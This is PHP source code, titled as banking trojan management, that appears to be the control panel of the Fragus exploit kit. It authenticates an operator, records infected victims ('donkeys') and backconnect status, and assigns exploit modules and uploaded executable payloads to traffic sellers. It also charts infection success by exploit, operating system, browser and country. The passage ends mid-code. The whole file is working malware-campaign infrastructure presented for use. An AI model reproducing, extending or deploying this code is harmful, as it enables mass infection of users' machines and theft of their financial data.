Source code banking trojan management

1. <?php
2.  
3. //*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@
4. //*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@
5. $_Errors = array();
6. $_Messages = array();
7.  
8. //*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@
9. //*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@
10. include("./secure/config.php");
11. session_start();
12.  
13.  
14. //*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@
15. //*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@
16. if (!isset($_SESSION['language'])){
17. $_SESSION['language'] = $config['AdminDefaultLanguage'];
18. }
19. if (isset($_POST['language'])){
20. $_SESSION['language'] = str_replace("\\", "", str_replace("/", "", str_replace(".", "", $_POST['language'])));
21. }
22.  
23.  
24. //*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@
25. //*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@
26. if (isset($_POST['auth'])){
27. if ((isset($_POST['login']) AND $_POST['login'] == $config['AdminLogin']) AND (isset($_POST['password']) AND md5($_POST['password']) == $config['AdminPassword'])){
28. $_SESSION['auth'] = TRUE;
29. header("Location: " . $_SERVER['PHP_SELF']);
30. exit();
31. } else {
32. $_Errors['FailsLogin'] = TRUE;
33. }
34. }
35.  
36.  
37. //*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@
38. //*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@
39. if (empty($_SESSION['auth'])){
40. $langoptions = "";
41. $langdir = ("./secure/templates");
42. for ($i = 0; $i < count($langdir); $i++){
43. if ($langdir[$i] != "." AND $langdir[$i] != ".." AND substr(strtolower($langdir[$i]), -4) != ".php"){
44. if (isset($_POST['language']) AND $_POST['language'] == $langdir[$i]){
45. $langoptions .= "<option value='" . $langdir[$i] . "' selected>" . ucfirst($langdir[$i]) . "</option>";
46. } elseif (!isset($_POST['language']) AND $config['AdminDefaultLanguage'] == $langdir[$i]){
47. $langoptions .= "<option value='" . $langdir[$i] . "' selected>" . ucfirst($langdir[$i]) . "</option>";
48. } else {
49. $langoptions .= "<option value='" . $langdir[$i] . "'>" . ucfirst($langdir[$i]) . "</option>";
50. }
51. }
52. }
53. include("./secure/templates/" . $_SESSION['language'] . "/admin_login.php");
54. exit();
55. }
56.  
57.  
58. //*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@
59. //*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@
60. mysql_connect($config['MysqlHost'], $config['MysqlUser'], $config['MysqlPassword']) or die("Could not connect to mysql server.");
61. mysql_select_db($config['MysqlDbname']) or die("Could not select database.");
62.  
63.  
64. //*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@
65. //*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@
66. $globalstat = mysql_fetch_array(mysql_query("SELECT SUM(1) AS `all`, SUM(`status` <> 'NOT') AS `frags` FROM `donkeys`"));
67. if (strlen($globalstat['all']) < 1){
68. $globalstat['all'] = 0;
69. $globalstat['frags'] = 0;
70. }
71. if (isset($_GET['get_ajax']) AND $_GET['get_ajax'] == "1"){
72. echo $globalstat['all'] . "|" . $globalstat['frags'];
73. exit();
74. }
75.  
76.  
77. //*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@
78. //*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@
79. if (isset($_GET['c']) AND $_GET['c'] == "logout"){
80. session_destroy();
81. header("Location: " . $_SERVER['PHP_SELF']);
82. exit();
83.  
84.  
85. //*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@
86. //*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@
87. } elseif (isset($_GET['c']) AND $_GET['c'] == "trafficlinks"){
88. include("./secure/javascript.php");
89. $sellerhash = "";
90. $selleroptions = "";
91. $result = mysql_query("SELECT `id`, `name`, `hash` FROM `sellers` ORDER BY `id` ASC");
92. while ($row = mysql_fetch_array($result)){
93. $selleroptions .= "<option value='" . $row['id'] . "'" . ((isset($_GET['seller_id']) AND $_GET['seller_id'] == $row['id']) ? " selected" : "") . ">" . $row['name'] . "</option>";
94. if (isset($_GET['seller_id']) AND $_GET['seller_id'] != '0' AND $_GET['seller_id'] == $row['id']){
95. $sellerhash = "?s=" . $row['hash'];
96. }
97. }
98. include("./secure/templates/" . $_SESSION['language'] . "/admin_trafficlinks.php");
99.  
100.  
101. //*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@
102. //*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@
103. } elseif (isset($_GET['c']) AND $_GET['c'] == "sellers"){
104.  
105. ///////
106. if (isset($_GET['edit_id']) AND intval($_GET['edit_id']) > 0){
107. if (isset($_POST['action']) AND $_POST['action'] == "edit"){
108. mysql_query("UPDATE `sellers` SET `name` = '" . mysql_real_escape_string((strlen($_POST['name']) > 0) ? $_POST['name'] : "noname") . "', `file` = " . intval($_POST['file']) . ", `exploits` = '" . mysql_real_escape_string(serialize(isset($_POST['exploits']) ? $_POST['exploits'] : array())) . "' WHERE `id` = " . intval($_GET['edit_id']));
109. header("Location: " . $_SERVER['PHP_SELF'] . "?c=sellers");
110. exit();
111. }
112. if ($row = mysql_fetch_array(mysql_query("SELECT * FROM `sellers` WHERE `id` = " . intval($_GET['edit_id'])))){
113. $seller['id'] = $row['id'];
114. $seller['name'] = $row['name'];
115. $seller['files'] = "";
116. $result = mysql_query("SELECT `id`, `description` FROM `files`");
117. while ($frow = mysql_fetch_array($result)){
118. $seller['files'] .= "<option value='" . $frow['id'] . "'" . (($frow['id'] == $row['file']) ? " selected" : "") . ">" . $frow['description'] . "</option>";
119. }
120. $seller['exploits'] = "";
121. $exp_default = unserialize($row['exploits']);
122. $exploitsdir = scandir("./secure/exploits");
123. for ($i = 0; $i < count($exploitsdir); $i++){
124. if ($exploitsdir[$i] != "." AND $exploitsdir[$i] != ".."){
125. list($name) = explode(".", $exploitsdir[$i]);
126. list(,$tmpname) = explode("-", $name);
127. $seller['exploits'] .= "<tr><td><input type='checkbox' id='exp" . $i . "' name='exploits[]' value='" . $name . "'" . (in_array($name, $exp_default) ? " checked" : "") . "></td><td><label for='exp" . $i . "'>" . $tmpname . "</label></td></tr>";
128. }
129. }
130. }
131. }
132.  
133. ///////
134. if (isset($_GET['delete_id']) AND intval($_GET['delete_id']) > 0){
135. mysql_query("DELETE FROM `donkeys` WHERE `seller` = " . intval($_GET['delete_id']) . "");
136. mysql_query("DELETE FROM `sellers` WHERE `id` = " . intval($_GET['delete_id']) . "");
137. header("Location: " . $_SERVER['PHP_SELF'] . "?c=sellers");
138. exit();
139. }
140.  
141. ///////
142. if (isset($_GET['clear_id']) AND intval($_GET['clear_id']) > 0){
143. mysql_query("DELETE FROM `donkeys` WHERE `seller` = " . intval($_GET['clear_id']) . "");
144. header("Location: " . $_SERVER['PHP_SELF'] . "?c=sellers");
145. exit();
146. }
147.  
148. ///////
149. if (isset($_POST['action']) AND $_POST['action'] == "add"){
150. mysql_query("INSERT INTO `sellers` (`name`, `hash`, `file`, `exploits`) VALUES ('" . mysql_real_escape_string((strlen($_POST['name']) > 0) ? $_POST['name'] : "noname") . "', '" . substr(md5(rand() . time()), 0, 10) . "', " . intval($_POST['file']) . ", '" . mysql_real_escape_string(serialize(isset($_POST['exploits']) ? $_POST['exploits'] : array())) . "')");
151. $_Messages['SellerAdded'] = TRUE;
152. }
153.  
154. ///////
155. $files = "";
156. $result = mysql_query("SELECT `id`, `description` FROM `files`");
157. while ($row = mysql_fetch_array($result)){
158. $files .= "<option value='" . $row['id'] . "'>" . $row['description'] . "</option>";
159. }
160.  
161. ///////
162. $exploits = "";
163. $exp_default = unserialize($config['Exploits']);
164. $exploitsdir = scandir("./secure/exploits");
165. for ($i = 0; $i < count($exploitsdir); $i++){
166. if ($exploitsdir[$i] != "." AND $exploitsdir[$i] != ".."){
167. list($name) = explode(".", $exploitsdir[$i]);
168. list(,$tmpname) = explode("-", $name);
169. $exploits .= "<tr><td><input type='checkbox' id='exp" . $i . "' name='exploits[]' value='" . $name . "'" . (@in_array($name, $exp_default) ? " checked" : "") . "></td><td><label for='exp" . $i . "'>" . $tmpname . "</label></td></tr>";
170. }
171. }
172.  
173. ///////
174. $sellers = array();
175. $i = 0;
176. $result = mysql_query("SELECT `sellers`.`id` AS `id`, `sellers`.`name` AS `name`, `sellers`.`hash` AS `hash`, `files`.`description` AS `file`, `sellers`.`exploits` AS `exploits`, (SELECT SUM(1) FROM `donkeys` WHERE `donkeys`.`seller` = `sellers`.`id`) AS `hosts`, (SELECT SUM(`donkeys`.`status` = 'LOAD' OR `donkeys`.`status` = 'BACKCONNECT') FROM `donkeys` WHERE `donkeys`.`seller` = `sellers`.`id`) AS `frags` FROM `sellers` LEFT JOIN `files` ON `files`.`id` = `sellers`.`file` ORDER BY `sellers`.`id` ASC");
177. while ($row = mysql_fetch_array($result)){
178. $sellers[$i]['id'] = $row['id'];
179. $sellers[$i]['name'] = $row['name'];
180. $sellers[$i]['hash'] = $row['hash'];
181. $sellers[$i]['file'] = $row['file'];
182. $sellers[$i]['exploits'] = unserialize($row['exploits']);
183. for ($z = 0; $z < count($sellers[$i]['exploits']); $z++){
184. list(,$tmpname) = explode("-", $sellers[$i]['exploits'][$z]);
185. $sellers[$i]['exploits'][$z] = $tmpname;
186. }
187. $sellers[$i]['hosts'] = $row['hosts'] * 1;
188. $sellers[$i]['frags'] = $row['frags'] * 1;
189. $i++;
190. }
191. include("./secure/templates/" . $_SESSION['language'] . "/admin_sellers.php");
192.  
193.  
194.  
195. //*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@
196. //*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@
197. } elseif (isset($_GET['c']) AND $_GET['c'] == "files"){
198.  
199. ///////
200. if (isset($_GET['edit_id']) AND intval($_GET['edit_id']) > 0){
201. if (isset($_POST['action']) AND $_POST['action'] == "edit"){
202. mysql_query("UPDATE `files` SET `name` = '" . mysql_real_escape_string((strlen($_POST['name']) > 0) ? $_POST['name'] : "noname.exe") . "', `description` = '" . mysql_real_escape_string((strlen($_POST['description']) > 0) ? $_POST['description'] : "nodescription") . "' WHERE `id` = " . intval($_GET['edit_id']));
203. if ($_FILES['filedata']['error'] == "0"){
204. move_uploaded_file($_FILES['filedata']['tmp_name'], "./secure/files/" . intval($_GET['edit_id']));
205. }
206. header("Location: " . $_SERVER['PHP_SELF'] . "?c=files");
207. exit();
208. }
209. if ($row = mysql_fetch_array(mysql_query("SELECT * FROM `files` WHERE `id` = " . intval($_GET['edit_id'])))){
210. $file['id'] = $row['id'];
211. $file['name'] = $row['name'];
212. $file['description'] = $row['description'];
213. }
214. }
215.  
216. ///////
217. if (isset($_POST['action']) AND $_POST['action'] == "add"){
218. if ($_FILES['filedata']['error'] == "0"){
219. mysql_query("INSERT INTO `files` (`name`, `description`) VALUES ('" . mysql_real_escape_string((strlen($_POST['name']) > 0) ? $_POST['name'] : "noname.exe") . "', '" . mysql_real_escape_string((strlen($_POST['description']) > 0) ? $_POST['description'] : "nodescription") . "')");
220. move_uploaded_file($_FILES['filedata']['tmp_name'], "./secure/files/" . mysql_insert_id());
221. $_Messages['FileAdded'] = TRUE;
222. } else {
223. $_Messages['FileNoAdded'] = TRUE;
224. }
225. }
226.  
227. ///////
228. if (isset($_GET['delete_id']) AND intval($_GET['delete_id']) > 0){
229. mysql_query("DELETE FROM `files` WHERE `id` = " . intval($_GET['delete_id']) . "");
230. mysql_query("UPDATE `sellers` SET `file` = 0 WHERE `file` = " . intval($_GET['delete_id']));
231. @unlink("./secure/files/" . intval($_GET['delete_id']));
232. header("Location: " . $_SERVER['PHP_SELF'] . "?c=files");
233. exit();
234. }
235.  
236. ///////
237. $files = array();
238. $i = 0;
239. $result = mysql_query("SELECT `files`.`id` AS `id`, `files`.`name` AS `name`, `files`.`description` AS `description`, (SELECT SUM(`donkeys`.`status` = 'LOAD' OR `donkeys`.`status` = 'BACKCONNECT') FROM `donkeys` WHERE `donkeys`.`file` = `files`.`id`) AS `frags`, (SELECT SUM(`donkeys`.`status` = 'BACKCONNECT') FROM `donkeys` WHERE `donkeys`.`file` = `files`.`id`) AS `backconnects` FROM `files` ORDER BY `files`.`id` ASC");
240. while ($row = mysql_fetch_array($result)){
241. $files[$i]['id'] = $row['id'];
242. $files[$i]['name'] = $row['name'];
243. $files[$i]['description'] = $row['description'];
244. $files[$i]['backconnects'] = $row['backconnects'] * 1;
245. $files[$i]['frags'] = $row['frags'] * 1;
246. $i++;
247. }
248. include("./secure/templates/" . $_SESSION['language'] . "/admin_files.php");
249.  
250.  
251. //*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@
252. //*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@
253. } elseif (isset($_GET['c']) AND $_GET['c'] == "preferences"){
254.  
255. ///////
256. if (isset($_POST['action']) AND $_POST['action'] == "save"){
257. file_put_contents("./secure/config.php", "<?php
258.  
259. \$config['FragusVersion'] = \"" . $config['FragusVersion'] . "\";
260. \$config['CryptSignature'] = \"" . $config['CryptSignature'] . "\";
261.  
262. \$config['MysqlHost'] = \"" . $config['MysqlHost'] . "\";
263. \$config['MysqlUser'] = \"" . $config['MysqlUser'] . "\";
264. \$config['MysqlPassword'] = \"" . $config['MysqlPassword'] . "\";
265. \$config['MysqlDbname'] = \"" . $config['MysqlDbname'] . "\";
266.  
267. \$config['AdminLogin'] = \"" . addslashes(trim($_POST['conf_login'])) . "\";
268. \$config['AdminPassword'] = \"" . ((strlen(trim($_POST['conf_pass'])) > 0) ? md5($_POST['conf_pass']) : $config['AdminPassword']) . "\";
269. \$config['AdminDefaultLanguage'] = \"" . addslashes(trim($_POST['conf_language'])) . "\";
270. \$config['AdminAjaxSeconds'] = " . intval($_POST['conf_ajaxseconds']) . ";
271. \$config['UrlToFolder'] = \"" . addslashes(trim($_POST['conf_url'])) . "\";
272. \$config['FinishRedirect'] = \"" . addslashes(trim($_POST['conf_finishurl'])) . "\";
273. \$config['DoubleIpRedirect'] = \"" . addslashes(trim($_POST['conf_doubleurl'])) . "\";
274. \$config['AjaxCheckBeforeExploit'] = " . (($_POST['conf_ajaxcheck'] == 1) ? 'TRUE' : 'FALSE') . ";
275. \$config['DefaultFile'] = \"" . intval($_POST['conf_defaultfile']) . "\";
276. \$config['Exploits'] = '" . serialize(isset($_POST['exploits']) ? $_POST['exploits'] : array()) . "';
277.  
278. ?>");
279. $config['AdminLogin'] = trim($_POST['conf_login']);
280. $config['AdminDefaultLanguage'] = trim($_POST['conf_language']);
281. $config['AdminAjaxSeconds'] = intval($_POST['conf_ajaxseconds']);
282. $config['UrlToFolder'] = trim($_POST['conf_url']);
283. $config['FinishRedirect'] = trim($_POST['conf_finishurl']);
284. $config['DoubleIpRedirect'] = trim($_POST['conf_doubleurl']);
285. $config['AjaxCheckBeforeExploit'] = ($_POST['conf_ajaxcheck'] == 1) ? TRUE : FALSE;
286. $config['DefaultFile'] = intval($_POST['conf_defaultfile']);
287. $config['Exploits'] =serialize(isset($_POST['exploits']) ? $_POST['exploits'] : array());
288. }
289.  
290.  
291. ///////
292. $langoptions = "";
293. $langdir = scandir("./secure/templates");
294. for ($i = 0; $i < count($langdir); $i++){
295. if ($langdir[$i] != "." AND $langdir[$i] != ".." AND substr(strtolower($langdir[$i]), -4) != ".php"){
296. if ($config['AdminDefaultLanguage'] == $langdir[$i]){
297. $langoptions .= "<option value='" . $langdir[$i] . "' selected>" . ucfirst($langdir[$i]) . "</option>";
298. } else {
299. $langoptions .= "<option value='" . $langdir[$i] . "'>" . ucfirst($langdir[$i]) . "</option>";
300. }
301. }
302. }
303.  
304. ///////
305. $fileslist = "";
306. if ($row = mysql_fetch_array(mysql_query("SELECT `id`, `description` FROM `files`"))){
307. $fileslist .= "<option value='" . $row['id'] . "'" . (($config['DefaultFile'] == $row['id']) ? ' selected' : ''). ">" . $row['description'] . "</option>";
308. }
309.  
310. ///////
311. $exploits = "";
312. $exp_default = unserialize($config['Exploits']);
313. $exploitsdir = scandir("./secure/exploits");
314. for ($i = 0; $i < count($exploitsdir); $i++){
315. if ($exploitsdir[$i] != "." AND $exploitsdir[$i] != ".."){
316. list($name) = explode(".", $exploitsdir[$i]);
317. list(,$tmpname) = explode("-", $name);
318. ($i%2 == 0) ? ($exploits .= '</tr><tr>') : '';
319. $exploits .= "<td width='50%'><table><tr><td><input type='checkbox' id='exp" . $i . "' name='exploits[]' value='" . $name . "'" . (@in_array($name, $exp_default) ? " checked" : "") . "></td><td><label for='exp" . $i . "'>" . $tmpname . "</label></td></tr></table></td>";
320. }
321. }
322.  
323. include("./secure/templates/" . $_SESSION['language'] . "/admin_preferences.php");
324.  
325.  
326. //*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@
327. //*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@*@
328. } else {
329.  
330. ///////
331. if (isset($_GET['clear_db']) AND $_GET['clear_db'] == "1"){
332. mysql_query("TRUNCATE TABLE `donkeys`");
333. header("Location: " . $_SERVER['PHP_SELF']);
334. exit();
335. }
336.  
337. ///////
338. include("./secure/geoip.php");
339. $gi = new GeoIP;
340.  
341. ///////
342. if (isset($_GET['img']) AND $_GET['img'] == "exploits"){
343. include("./secure/pchart.php");
344. $explarray = array();
345. $exploitsdir = scandir("./secure/exploits");
346. for ($i = 0; $i < count($exploitsdir); $i++){
347. if ($exploitsdir[$i] != "." AND $exploitsdir[$i] != ".."){
348. list($name) = explode(".", $exploitsdir[$i]);
349. list($id, $namee) = explode("-", $name);
350. $explarray[$id] = $namee;
351. }
352. }
353. $result = mysql_query("SELECT `exploit`, SUM(1) AS `all`, SUM(`status` = 'BACKCONNECT') AS `loaded` FROM `donkeys` WHERE `status` <> 'NOT'" . ((isset($_GET['seller_id']) AND $_GET['seller_id'] != '0') ? " AND `seller` = '" . intval($_GET['seller_id']) . "'" : "") . " GROUP BY `exploit` ORDER BY `loaded` DESC, `all` DESC LIMIT 6");
354. $browsers = array();
355. $sum_all = array();
356. $sum_frags = array();
357. while ($row = mysql_fetch_array($result)){
358. $sum_all[] = $row['all'];
359. $sum_frags[] = $row['loaded'];
360. $browsers[] = ($row['exploit'] == 0) ? "OTHER" : $explarray[$row['exploit']];
361. }
362.  
363. $DataSet = new pData;
364. if (count($browsers) > 0){
365. $DataSet->AddPoint($sum_all,"Serie1");
366. $DataSet->AddPoint($sum_frags,"Serie2");
367. $DataSet->AddPoint($browsers,"Serie3");
368. } else {
369. $DataSet->AddPoint(array(0),"Serie1");
370. $DataSet->AddPoint(array(0),"Serie2");
371. $DataSet->AddPoint(array("Data is empty"),"Serie3");
372. }
373. $DataSet->AddAllSeries();
374. $DataSet->SetAbsciseLabelSerie();
375. $DataSet->SetSerieName("Frags","Serie1");
376. $DataSet->SetSerieName("Feedback","Serie2");
377. $DataSet->SetAbsciseLabelSerie("Serie3");
378. $Test = new pChart(480,180);
379. $Test->setFontProperties("./secure/tahoma.ttf",8);
380. $Test->setGraphArea(55,20,385,150);
381. $Test->drawFilledRoundedRectangle(7,7,473,173,5,240,240,240);
382. $Test->drawRoundedRectangle(5,5,475,175,5,230,230,230);
383. $Test->drawGraphArea(255,255,255,TRUE);
384. $Test->drawScale($DataSet->GetData(),$DataSet->GetDataDescription(),SCALE_START0,150,150,150,TRUE,0,2,TRUE);
385. $Test->drawGrid(4,TRUE,230,230,230,50);
386. $DataSet->RemoveSerie("Serie3");
387. $Test->setFontProperties("./secure/tahoma.ttf",6);
388. $Test->drawTreshold(0,143,55,72,TRUE,TRUE);
389. $Test->drawOverlayBarGraph($DataSet->GetData(),$DataSet->GetDataDescription());
390. $Test->setFontProperties("./secure/tahoma.ttf",8);
391. $Test->drawLegend(395,20,$DataSet->GetDataDescription(),255,255,255);
392. $Test->Render("./secure/files/exploits.png");
393. header("Content-type: image/png");
394. echo file_get_contents("./secure/files/exploits.png");
395. unlink("./secure/files/exploits.png");
396. exit();
397. }
398.  
399. ///////
400. if (isset($_GET['img']) AND $_GET['img'] == "os"){
401. include("./secure/pchart.php");
402. $result = mysql_query("SELECT `os`, SUM(1) AS `all`, SUM(`status` = 'LOAD' OR `status` = 'BACKCONNECT') AS `loaded` FROM `donkeys`" . ((isset($_GET['seller_id']) AND $_GET['seller_id'] != '0') ? " WHERE `seller` = '" . intval($_GET['seller_id']) . "'" : "") . " GROUP BY `os` ORDER BY `loaded` DESC, `all` DESC LIMIT 8");
403. $browsers = array();
404. $sum_all = array();
405. $sum_frags = array();
406. while ($row = mysql_fetch_array($result)){
407. $sum_all[] = $row['all'];
408. $sum_frags[] = $row['loaded'];
409. if ($row['os'] == "95" OR $row['os'] == "98" OR $row['os'] == "2000" OR $row['os'] == "2003"){
410. $browsers[] = chr(160) . $row['os'];
411. } else {
412. $browsers[] = $row['os'];
413. }
414. }
415. $DataSet = new pData;
416. if (count($browsers) > 0){
417. $DataSet->AddPoint($sum_all,"Serie1");
418. $DataSet->AddPoint($sum_frags,"Serie2");
419. $DataSet->AddPoint($browsers,"Serie3");
420. } else {
421. $DataSet->AddPoint(array(0),"Serie1");
422. $DataSet->AddPoint(array(0),"Serie2");
423. $DataSet->AddPoint(array("Data is empty"),"Serie3");
424. }
425. $DataSet->AddAllSeries();
426. $DataSet->SetAbsciseLabelSerie();
427. $DataSet->SetSerieName("All","Serie1");
428. $DataSet->SetSerieName("Frags","Serie2");
429. $DataSet->SetAbsciseLabelSerie("Serie3");
430. $Test = new pChart(480,180);
431. $Test->setFontProperties("./secure/tahoma.ttf",8);
432. $Test->setGraphArea(55,20,385,150);
433. $Test->drawFilledRoundedRectangle(7,7,473,173,5,240,240,240);
434. $Test->drawRoundedRectangle(5,5,475,175,5,230,230,230);
435. $Test->drawGraphArea(255,255,255,TRUE);
436. $Test->drawScale($DataSet->GetData(),$DataSet->GetDataDescription(),SCALE_START0,150,150,150,TRUE,0,2,TRUE);
437. $Test->drawGrid(4,TRUE,230,230,230,50);
438. $DataSet->RemoveSerie("Serie3");
439. $Test->setFontProperties("./secure/tahoma.ttf",6);
440. $Test->drawTreshold(0,143,55,72,TRUE,TRUE);
441. $Test->drawOverlayBarGraph($DataSet->GetData(),$DataSet->GetDataDescription());
442. $Test->setFontProperties("./secure/tahoma.ttf",8);
443. $Test->drawLegend(400,20,$DataSet->GetDataDescription(),255,255,255);
444. $Test->Render("./secure/files/os.png");
445. header("Content-type: image/png");
446. echo file_get_contents("./secure/files/os.png");
447. unlink("./secure/files/os.png");
448. exit();
449. }
450.  
451. ///////
452. if (isset($_GET['img']) AND $_GET['img'] == "browsers"){
453. include("./secure/pchart.php");
454. $result = mysql_query("SELECT `browser`, SUM(1) AS `all`, SUM(`status` = 'LOAD' OR `status` = 'BACKCONNECT') AS `loaded` FROM `donkeys`" . ((isset($_GET['seller_id']) AND $_GET['seller_id'] != '0') ? " WHERE `seller` = '" . intval($_GET['seller_id']) . "'" : "") . " GROUP BY `browser` ORDER BY `loaded` DESC, `all` DESC");
455. $browsers = array();
456. $sum_all = array();
457. $sum_frags = array();
458. while ($row = mysql_fetch_array($result)){
459. $sum_all[] = $row['all'];
460. $sum_frags[] = $row['loaded'];
461. $browsers[] = $row['browser'];
462. }
463. $DataSet = new pData;
464. if (count($browsers) > 0){
465. $DataSet->AddPoint($sum_all,"Serie1");
466. $DataSet->AddPoint($sum_frags,"Serie2");
467. $DataSet->AddPoint($browsers,"Serie3");
468. } else {
469. $DataSet->AddPoint(array(0),"Serie1");
470. $DataSet->AddPoint(array(0),"Serie2");
471. $DataSet->AddPoint(array("Data is empty"),"Serie3");
472. }
473. $DataSet->AddAllSeries();
474. $DataSet->SetAbsciseLabelSerie();
475. $DataSet->SetSerieName("All","Serie1");
476. $DataSet->SetSerieName("Frags","Serie2");
477. $DataSet->SetAbsciseLabelSerie("Serie3");
478. $Test = new pChart(480,180);
479. $Test->setFontProperties("./secure/tahoma.ttf",8);
480. $Test->setGraphArea(55,20,385,150);
481. $Test->drawFilledRoundedRectangle(7,7,473,173,5,240,240,240);
482. $Test->drawRoundedRectangle(5,5,475,175,5,230,230,230);
483. $Test->drawGraphArea(255,255,255,TRUE);
484. $Test->drawScale($DataSet->GetData(),$DataSet->GetDataDescription(),SCALE_START0,150,150,150,TRUE,0,2,TRUE);
485. $Test->drawGrid(4,TRUE,230,230,230,50);
486. $DataSet->RemoveSerie("Serie3");
487. $Test->setFontProperties("./secure/tahoma.ttf",6);
488. $Test->drawTreshold(0,143,55,72,TRUE,TRUE);
489. $Test->drawOverlayBarGraph($DataSet->GetData(),$DataSet->GetDataDescription());
490. $Test->setFontProperties("./secure/tahoma.ttf",8);
491. $Test->drawLegend(400,20,$DataSet->GetDataDescription(),255,255,255);
492. $Test->Render("./secure/files/browsers.png");
493. header("Content-type: image/png");
494. echo file_get_contents("./secure/files/browsers.png");
495. unlink("./secure/files/browsers.png");
496. exit();
497. }
498.  
499. ///////
500. if (isset($_GET['img']) AND $_GET['img'] == "country"){
501. include("./secure/pchart.php");
502. $result = mysql_query("SELECT `country`, SUM(1) AS `all`, SUM(`status` = 'LOAD' OR `status` = 'BACKCONNECT') AS `loaded` FROM `donkeys`" . ((isset($_GET['seller_id']) AND $_GET['seller_id'] != '0') ? " WHERE `seller` = '" . intval($_GET['seller_id']) . "'" : "") . " GROUP BY `country` ORDER BY `loaded` DESC, `all` DESC LIMIT 10");
503. $countrys = array();
504. $sum_all = array();
505. $sum_frags = array();
506. while ($row = mysql_fetch_array($result)){
507. $sum_all[] = $row['all'];
508. $sum_frags[] = $row['loaded'];
509. $countrys[] = ($row['country'] == 0) ? "??" : $gi->GEOIP_COUNTRY_CODES[$row['country']];
510. }
511. $DataSet = new pData;
512. if (count($countrys) > 0){
513. $DataSet->AddPoint($sum_all,"Serie1");
514. $DataSet->AddPoint($sum_frags,"Serie2");
515. $DataSet->AddPoint($countrys,"Serie3");
516. } else {
517. $DataSet->AddPoint(array(0),"Serie1");
518. $DataSet->AddPoint(array(0),"Serie2");
519. $DataSet->AddPoint(array("Data is empty"),"Serie3");
520. }
521. $DataSet->AddAllSeries();
522. $DataSet->SetAbsciseLabelSerie();
523. $DataSet->SetSerieName("All","Serie1");
524. $DataSet->SetSerieName("Frags","Serie2");
525. $DataSet->SetAbsciseLabelSerie("Serie3");
526. $Test = new pChart(480,180);
527. $Test->setFontProperties("./secure/tahoma.ttf",8);
528. $Test->setGraphArea(55,20,385,150);
529. $Test->drawFilledRoundedRectangle(7,7,473,173,5,240,240,240);
530. $Test->drawRoundedRectangle(5,5,475,175,5,230,230,230);
531. $Test->drawGraphArea(255,255,255,TRUE);
532. $Test->drawScale($DataSet->GetData(),$DataSet->GetDataDescription(),SCALE_START0,150,150,150,TRUE,0,2,TRUE);
533. $Test->drawGrid(4,TRUE,230,230,230,50);
534. $DataSet->RemoveSerie("Serie3");
535. $Test->setFontProperties("./secure/tahoma.ttf",6);
536. $Test->drawTreshold(0,143,55,72,TRUE,TRUE);
537. $Test->drawOverlayBarGraph($DataSet->GetData(),$DataSet->GetDataDescription());
538. $Test->setFontProperties("./secure/tahoma.ttf",8);
539. $Test->drawLegend(400,20,$DataSet->GetDataDescription(),255,255,255);
540. $Test->Render("./secure/files/country.png");
541. header("Content-type: image/png");
542. echo file_get_contents("./secure/files/country.png");
543. unlink("./secure/files/country.png");
544. exit();
545. }
546.  
547. ///////
548. $selleroptions = "";
549. $result = mysql_query("SELECT `id`, `name` FROM `sellers` ORDER BY `id` ASC");
550. while ($row = mysql_fetch_array($result)){
551. $selleroptions .= "<option value='" . $row['id'] . "'" . ((isset($_GET['seller_id']) AND $_GET['seller_id'] == $row['id']) ? " selected" : "") . ">" . $row['name'] . "</option>";
552. }
553.  
554. ///////
555. $result = mysql_query("SELECT `browser`, SUM(1) AS `all`, SUM(`status` = 'LOAD' OR `status` = 'BACKCONNECT') AS `loaded` FROM `donkeys`" . ((isset($_GET['seller_id']) AND $_GET['seller_id'] != '0') ? " WHERE `seller` = '" . intval($_GET['seller_id']) . "'" : "") . " GROUP BY `browser` ORDER BY `loaded` DESC, `all` DESC");
556. $browsers = array();
557. $browsers['browser'] = array();
558. $browsers_versions = array();
559. $i = 0;
560. while ($row = mysql_fetch_array($result)){
561. $browsers['browser'][$i] = $row['browser'];
562. $browsers['all'][$i] = $row['all'];
563. $browsers['frags'][$i] = $row['loaded'];
564. $z = 0;
565. $result2 = mysql_query("SELECT `browser_version` AS `version`, SUM(1) AS `sum`, SUM(`status` = 'LOAD' OR `status` = 'BACKCONNECT') AS `frags` FROM `donkeys` WHERE `browser` = '" . $row['browser'] . "'" . ((isset($_GET['seller_id']) AND $_GET['seller_id'] != '0') ? " AND `seller` = '" . intval($_GET['seller_id']) . "'" : "") . " GROUP BY `browser_version` ORDER BY `frags` DESC, `sum` DESC LIMIT 10");
566. while ($row2 = mysql_fetch_array($result2)){
567. $browsers_versions[$row['browser']]['version'][$z] = $row2['version'];
568. $browsers_versions[$row['browser']]['sum'][$z] = $row2['sum'];
569. $browsers_versions[$row['browser']]['frags'][$z] = $row2['frags'];
570. $z++;
571. }
572. $i++;
573. }
574.  
575. ///////
576. $result = mysql_query("SELECT `os`, SUM(1) AS `all`, SUM(`status` = 'LOAD' OR `status` = 'BACKCONNECT') AS `loaded` FROM `donkeys`" . ((isset($_GET['seller_id']) AND $_GET['seller_id'] != '0') ? " WHERE `seller` = '" . intval($_GET['seller_id']) . "'" : "") . " GROUP BY `os` ORDER BY `loaded` DESC, `all` DESC");
577. $oss = array();
578. $oss['os'] = array();
